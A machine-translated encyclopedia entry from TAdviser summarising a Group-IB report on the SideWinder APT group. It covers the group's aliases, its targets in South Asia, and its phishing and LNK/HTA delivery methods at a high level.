RSS
Логотип
Баннер в шапке 1
Баннер в шапке 2

SideWinder (hacker group)

Company

Information security
Asia


Content

History

2023: Group-IB spoke in detail about SideWinder

Group-IB information security hacker To APT group In February 2023, a Russian technology company spoke in detail about SideWinder, which, according to researchers, is sponsored by the Indian authorities. The main targets of cybercriminals are state bodies, military organizations and the energy sector.

The hacker group SideWinder also has other names: Rattlesnake, Hardcore Nationalist, RAZOR TIGER, T-APT-04 and APT-C-17. Despite SideWinder being seen attacking government, military and financial institutions in Afghanistan, Nepal, Sri Lanka, Bhutan, Myanmar, the Philippines, Bangladesh, Singapore and China, the main target of hackers is Pakistan. Moreover, SideWinder, at least since 2019, is of particular interest to military facilities and targets in Pakistan. Local authorities have even issued an alert warning of threats from SideWinder and how to protect against them.

As the main vector of the attack, the group uses phishing links in letters or posts that mimic legitimate alerts and services of various government agencies and organizations in Pakistan. In addition, the group was seen cloning government websites to collect user credentials. For example, here is a phishing authentication page of one of the state portals of Sri Lanka.

SideWinder began using an anti-bot script to filter potential victims - attackers are only interested in users from Pakistan. The group also uses familiar techniques of sending malicious files in the form of a ZIP archive with an LNK file inside, which downloads an HTA file from a remote server.

According to Group-IB, in 2021 alone, hackers tried to attack dozens of government and military organizations in Afghanistan, Bhutan, Myanmar, Nepal and Sri Lanka. This cyber campaign involved hackers using Telegram to obtain information from hacked networks.

The researchers also discovered two phishing projects that mimic cryptocurrency companies. SideWinder's growing interest in cryptocurrency could be linked to attempts to regulate the crypto market in India.[1]

Notes

  1. Group-IB report details previously unknown Indian-sponsored SideWinder campaign
Источник — «https://tadviser.com/index.php/Company:SideWinder_(hacker_group)»

Шестерня

The site content is translated by machine translation software powered by PROMT. The machine-translated articles are not always perfect and may contain errors in vocabulary, syntax or grammar. Read original article

If you find inaccuracies or errors in the results of machine translation, please write to editor@tadviser.ru. We will make every effort to correct them as soon as possible.

How to create a "smart plant": Key characteristics of a modern digital enterprise
Model Studio CS: How to use BIM to give new impetus to the development of the fuel and energy complex